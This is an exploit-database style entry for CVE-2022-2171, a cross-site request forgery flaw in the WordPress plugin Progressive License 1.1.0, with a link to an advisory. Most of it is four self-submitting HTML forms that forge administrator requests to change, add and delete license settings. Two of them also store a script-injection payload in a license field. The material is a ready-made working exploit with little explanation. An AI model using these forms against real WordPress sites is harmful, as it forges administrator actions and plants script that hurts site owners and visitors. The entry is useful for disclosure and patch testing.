CVE: CVE-2022-2171

Name: Progressive License (progressive-license)

Version: 1.1.0

Date: 2022-04-23 19:40:39

Advisory: https://wpscan.com/vulnerability/11937296-7ecf-4b94-b274-06f7990dbede

Type: CSRF

Exploit: 


<form action="https://example.com/wp-admin/options-general.php" method="POST">
    <input type="text" name="acc_data[timeframe_1][duration]" value="0">
    <input type="text" name="acc_data[timeframe_1][key]" value="test">
    <input type="text" name="acc_data[timeframe_expire][key]" value="none">
    <input type="text" name="show_images" value="yes">
    <input type="text" name="acc_action" value="update_settings">
    <input type="text" name="acc_infinity" value="∞">
    <input type="text" name="submit" value="Update License Settings">
</form>
<script>
    HTMLFormElement.prototype.submit.call(
        document.forms[0]
    );
</script>


<form action="https://example.com/wp-admin/options-general.php" method="POST">
    <input type="text" name="acc_license[name]" value="test">
    <input type="text" name="acc_license[url]" value="">
    <input type="text" name="acc_license[image]" value="">
    <input type="text" name="acc_license[rdf]" value="--><img src=x onerror=alert(1)>">
    <input type="text" name="acc_action" value="edited">
    <input type="text" name="acc_license_key" value="test">
    <input type="text" name="submit" value="Save Changes">
</form>
<script>
    HTMLFormElement.prototype.submit.call(
        document.forms[0]
    );
</script>


<form action="https://example.com/wp-admin/options-general.php" method="POST">
    <input type="text" name="delete_license" value="Delete">
    <input type="text" name="acc_license_key" value="test2">
    <input type="text" name="acc_action" value="delete">
</form>
<script>
    document.forms[0].submit();
</script>


<form action="https://example.com/wp-admin/options-general.php" method="POST">
    <input type="text" name="acc_license[name]" value="bbb">
    <input type="text" name="acc_license[url]" value="">
    <input type="text" name="acc_license[image]" value="">
    <input type="text" name="acc_license[rdf]" value="--><img src=x onerror=alert(1)>">
    <input type="text" name="acc_action" value="add">
    <input type="text" name="submit" value="Submit New License">
</form>
<script>
    HTMLFormElement.prototype.submit.call(
        document.forms[0]
    );
</script>